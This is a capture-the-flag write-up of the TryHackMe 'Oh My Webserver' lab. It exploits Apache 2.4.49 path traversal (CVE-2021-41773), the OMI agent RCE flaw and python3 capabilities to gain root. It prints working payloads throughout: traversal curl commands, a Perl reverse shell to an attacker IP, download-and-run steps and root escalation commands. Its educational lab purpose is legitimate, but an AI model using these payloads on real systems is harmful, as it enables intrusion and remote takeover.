This is my writeup for the Oh My Webserver room/machine of the TryHackMe.com platform. Remember this is just how I solved/owned the machine, maybe there are different and fast paths but…
Machine
Can you root me?
The machine is rated as a medium machine and if you’re looking for a good machine…go for it. Thanks a lot to tinyb0y for this machine! Thanks a lot also to the great cyberaguiar, he helped me to reach the proper vector (after the first unintended way to exploit the machine)! If you want to discuss or if you’ve any problem just grab me a message on Discord (user kraba#4968).
The techiques used in this machine over a small enumeration:
Recon
Point 0: my IP for the server was 10.10.10.133, when you read it…just change it with yours
First of all I run a classic nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
nmap -sC -sV -p- 10.10.10.133
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-05 11:51 GMT
Stats: 0:00:26 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 16.59% done; ETC: 11:53 (0:02:06 remaining)
Stats: 0:01:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 74.53% done; ETC: 11:53 (0:00:30 remaining)
Nmap scan report for 10.10.10.133
Host is up (0.032s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e0:d1:88:76:2a:93:79:d3:91:04:6d:25:16:0e:56:d4 (RSA)
| 256 91:18:5c:2c:5e:f8:99:3c:9a:1f:04:24:30:0e:aa:9b (ECDSA)
|_ 256 d1:63:2a:36:dd:94:cf:3c:57:3e:8a:e8:85:00:ca:f6 (ED25519)
80/tcp open http Apache httpd 2.4.49 ((Unix))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.49 (Unix)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
I’m looking at a Linux machine with two open ports: 22, 80.
When I browse the page 80 I reach just the default apache default home page:
1
2
|
curl http://10.10.10.133
<html><body><h1>It works!</h1></body></html>
|
I ran several gobuster, dirb, ffuf, wfuzz…nothing, there is nothing!
But wait, I checked the Apache version…it sounds familiar: 2.4.49, oh the CVE-2021-41773
You may find other and working exploit but what we need here is just cURL.
According to the mr-exo github page I can just run
1
|
curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
|
Let’s try it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami'
daemon
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
|
It’s working! Let’s upload a shell and gain access, I use a perl one, after few checks…it’s a docker image and I don’t know how many sw are installed:
1
2
3
|
vi shell.sh
perl -e 'use Socket;$i="10.11.55.171";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
and I run 3 cURLs requests:
1
2
3
4
5
|
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;curl http://10.11.55.171/shell.sh -o /tmp/shell.sh'
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;chmod +x /tmp/shell.sh'
curl 'http://10.10.10.133/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo;sh /tmp/shell.sh'
|
and my netcat listener have a connection:
1
2
3
4
5
6
7
8
|
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.11.55.171] from (UNKNOWN) [10.10.10.133] 36344
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
daemon@f1984047b638:/$
|
PE to root on docker
I used as usual linpeas.sh (i’m lazy on saturday) and I found a super fast PE to root into the docker image:
1
2
|
Files with capabilities (limited to 50):
/usr/bin/python3.7 = cap_setuid+ep
|
As usual on gtfobins there is a way to use it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
id
uid=0(root) gid=1(daemon) groups=1(daemon)
# cd /root
cd /root
# ls -ltra
ls -ltra
total 28
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwxr-xr-x 3 root root 4096 Oct 8 05:37 .cache
lrwxrwxrwx 1 root root 9 Oct 8 05:43 .bash_history -> /dev/null
-rw-r--r-- 1 root root 38 Oct 8 05:47 user.txt
drwxr-xr-x 1 root root 4096 Oct 8 08:22 ..
-rw------- 1 root daemon 12 Oct 8 08:28 .python_history
drwx------ 1 root root 4096 Oct 8 08:28 .
# cat user.txt
cat user.txt
THM{REDACTED}
|
Well! First flag done!
PE to root
After further research, checks, enumeration and so on…nothing was “pretty clear”.
I’m into a docker image, every possible way to escalate/breakout I know was checked…no way! Thanks to cyberaguiar I found the way.
I’m into docker, nothing seems to be running except the port 80:
1
2
3
4
5
|
root@4a70924bafa0:/tmp# netstat -tulpn
netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
|
and my IP is 172.17.0.2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
root@4a70924bafa0:/tmp# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 4861 bytes 6267674 (5.9 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 133875 bytes 9894711 (9.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
|
Why not checking the host IP 172.17.0.1 (the one which run docker)?
Nmap is not installed, I grabbed it from the andrew-d github page (or better here) and I run it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
root@4a70924bafa0:/bin# cd /tmp
root@4a70924bafa0:/tmp# curl 10.11.55.171/nmap -o nmap
root@4a70924bafa0:/tmp# chmod +x nmap
root@4a70924bafa0:/tmp# ./nmap -sT -p- 172.17.0.1
Host is up (0.0044s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5985/tcp closed unknown
5986/tcp open unknown
MAC Address: 02:42:19:6E:E8:C1 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 105.07 seconds
|
Ummm interesting! The port 5986 is open and is open only locally (the first nmap was showing only 22 and 80).
Let’s check what this port is used for on hacktricks:
OMI is an open-source remote configuration management tool developed by Microsoft. OMI agents are commonly found installed on Azure Linux servers…
Ah! Good! This machine is “replica” of an Azure Linux server running docker and a service called OMI agent. At the end of the page there are some useful info: there is a CVE. Other useful links are this one and this one.
Let’s look for an exploit on github and there are two options, the horizon3ai one and the AlteredSecurity one. The exploit is pretty the same or it’s doing the same stuff…I choosed the second one and saved the py into my box.
I try to run it:
1
2
3
|
root@4a70924bafa0:/tmp# curl 10.11.55.171/exploit.py -o exp.py
root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "whoami"
root
|
And is working. Let’s grab the flag and run a reverse shell (the same used at the beginning):
1
2
3
4
5
6
7
8
|
root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "cat /root/root.txt"
THM{REDACTED}
root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "curl http://10.11.55.171/shell.sh -o /tmp/shell.sh"
None
root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "chmod +x /tmp/shell.sh"
None
root@4a70924bafa0:/tmp# python3 exp.py -t 10.10.191.31 -p 5986 -c "sh /tmp/shell.sh"
|
and my listener:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.11.55.171] from (UNKNOWN) [10.10.10.133] 51410
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux ubuntu 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
# cd /root
# ls -ltra
total 56
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwxr-xr-x 20 root root 4096 Sep 30 05:05 ..
drwx------ 2 root root 4096 Sep 30 05:19 .ssh
drwxr-xr-x 3 root root 4096 Sep 30 05:20 snap
-rw------- 1 root root 1024 Sep 30 05:53 .rnd
-rw-r--r-- 1 root root 277 Oct 8 04:33 .wget-hsts
-rw------- 1 root root 12125 Oct 8 05:05 .viminfo
-rw-r--r-- 1 root root 38 Oct 8 05:48 root.txt
-rw------- 1 root root 169 Oct 8 08:24 .bash_history
drwxr-xr-x 3 root root 4096 Feb 23 05:20 .local
drwx------ 5 root root 4096 Feb 23 05:20 .
# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:42245 0.0.0.0:* LISTEN 678/containerd
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1161/docker-proxy
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 624/systemd-resolve
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 751/sshd: /usr/sbin
tcp6 0 0 :::80 :::* LISTEN 1173/docker-proxy
tcp6 0 0 :::22 :::* LISTEN 751/sshd: /usr/sbin
tcp6 0 0 :::5986 :::* LISTEN 941/omiengine
udp 0 0 127.0.0.53:53 0.0.0.0:* 624/systemd-resolve
udp 0 0 10.10.191.31:68 0.0.0.0:* 621/systemd-network
|
Machine done!